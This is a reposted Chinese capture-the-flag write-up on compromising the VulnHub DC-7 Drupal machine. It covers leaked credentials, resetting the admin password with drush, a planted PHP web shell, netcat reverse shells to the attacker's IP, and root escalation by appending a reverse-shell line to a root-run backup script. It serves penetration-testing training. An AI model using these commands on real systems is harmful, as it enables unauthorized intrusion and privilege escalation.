【VulnHub靶场】DC-7之脚本提权渗透拿flag

admin 2025年4月8日20:50:12评论6 views字数 1508阅读5分1秒阅读模式

靶场的搭建

从官网直接用迅雷下载就会快一点:https://www.vulnhub.com/entry/dc-7,356/,解压之后用vm直接打开ova文件即可,要注意一下靶机和攻击机(kali)要在同一个局域网内哦!!!,比如我这里的靶机和攻击机都是用net模式连接的网络

信息收集

主机扫描

【VulnHub靶场】DC-7之脚本提权渗透拿flag靶机的ip:192.168.2.140

端口扫描

【VulnHub靶场】DC-7之脚本提权渗透拿flag该靶场开放的端口是ssh服务的22端口,http服务的80端口

目录扫描

【VulnHub靶场】DC-7之脚本提权渗透拿flag

网站信息扫描

【VulnHub靶场】DC-7之脚本提权渗透拿flagcms是用Drupal 8

信息收集总结

端口:20、80有登录的页面web指纹识别:drupal 8

漏洞扫描

根据前面我们已经知道了这个cms指纹识别是drupal系统,我们用kali的msf扫描一下看看有没有什么可以利用的脚本或者文件

【VulnHub靶场】DC-7之脚本提权渗透拿flag找到了两个,但是都试了一下,发现建立不了会话,可能是版本太高了,只能另外想办法建立连接。

漏洞利用

80端口

【VulnHub靶场】DC-7之脚本提权渗透拿flag我们发现在80端口中,每一个都有作者的名字,而且,已经提示我们要跳出框,我们先来找一下作者,用社工的方法看看有没有什么有用的信息可以利用。

【VulnHub靶场】DC-7之脚本提权渗透拿flag进入资源库发现有一个配置文件,里面存储着用户名和密码,以及数据库名:username="dc7user" password = "MdR3xOgB7#dW";

【VulnHub靶场】DC-7之脚本提权渗透拿flag

根据前面的信息收集我们可以知道开放了22端口,我们可以用dc7user这个用户进行ssh连接

22端口ssh连接

连接成功,而且提示我们有一个邮件

【VulnHub靶场】DC-7之脚本提权渗透拿flag

【VulnHub靶场】DC-7之脚本提权渗透拿flag

发现有一个root的临时文件,文件路径:/opt/scripts/backups.sh

【VulnHub靶场】DC-7之脚本提权渗透拿flag我们先来看看这个文件的权限

【VulnHub靶场】DC-7之脚本提权渗透拿flag

查看发现两个命令,gpg和drush,gpg是用来加密的,drupal框架中用来做一些配置的命令,它可以改变网站后台admin用户的密码,发现了个drush命令,这个是drupal专属的一个操作系统命令

drush改密码

找出账户名

先进入drupal的目录下,寻找管理员账号,我们先试着查一下用户名为admin,看看存不存在

【VulnHub靶场】DC-7之脚本提权渗透拿flag发现存在admin用户,但是我们不知道密码

改密码

drush upwd admin --password="123456"

【VulnHub靶场】DC-7之脚本提权渗透拿flag

修改成功

后台登录成功

【VulnHub靶场】DC-7之脚本提权渗透拿flag接下来就是找能够上传shell的位置,一般都是在留言框

上传shell

但是有一个问题是没有php编译器,但是我们可以通过扩展来添加php解释器

【VulnHub靶场】DC-7之脚本提权渗透拿flag我们先从官网解释器(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz )

【VulnHub靶场】DC-7之脚本提权渗透拿flag安装成功【VulnHub靶场】DC-7之脚本提权渗透拿flag启动php

【VulnHub靶场】DC-7之脚本提权渗透拿flag
【VulnHub靶场】DC-7之脚本提权渗透拿flag

写入一句话木马

简单的一句话木马 GetShell

【VulnHub靶场】DC-7之脚本提权渗透拿flag

蚁剑连接

【VulnHub靶场】DC-7之脚本提权渗透拿flag

反弹shell

kali开启监听端口

nc -lvvp 7777
【VulnHub靶场】DC-7之脚本提权渗透拿flag

蚁剑反弹shell

 nc -e /bin/bash 192.168.2.129 7777
 【VulnHub靶场】DC-7之脚本提权渗透拿flag

成功反弹

【VulnHub靶场】DC-7之脚本提权渗透拿flag

提权

进入交互式

python -c "import pty;pty.spawn('/bin/bash')"

【VulnHub靶场】DC-7之脚本提权渗透拿flag

前面我们知道backups.sh的脚本文件是www-data的权限,所以我们现在反弹shell得到了www-data的权限,所以我们可以用这个脚本来提权

【VulnHub靶场】DC-7之脚本提权渗透拿flag脚本文件提权 

echo "nc -e /bin/bash 192.168.2.129 1234" >> /opt/scripts/backups.sh
【VulnHub靶场】DC-7之脚本提权渗透拿flag

写入成功,先监听端口,接下来只要等待backups.sh文件定时root权限执行就好了 kali 

nc -lvvp 1234

提权成功

【VulnHub靶场】DC-7之脚本提权渗透拿flag

GET flag

【VulnHub靶场】DC-7之脚本提权渗透拿flag

更多靶场信息感兴趣的师傅可以关注微信 公众号【Cauchy网安】,一起一步步慢慢来,该到达的高度终将会抵达的,加油,如有雷同纯属巧合

原文始发于微信公众号(Cauchy网安):【VulnHub靶场】DC-7之脚本提权渗透拿flag

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月8日20:50:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【VulnHub靶场】DC-7之脚本提权渗透拿flaghttps://cn-sec.com/archives/3927430.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息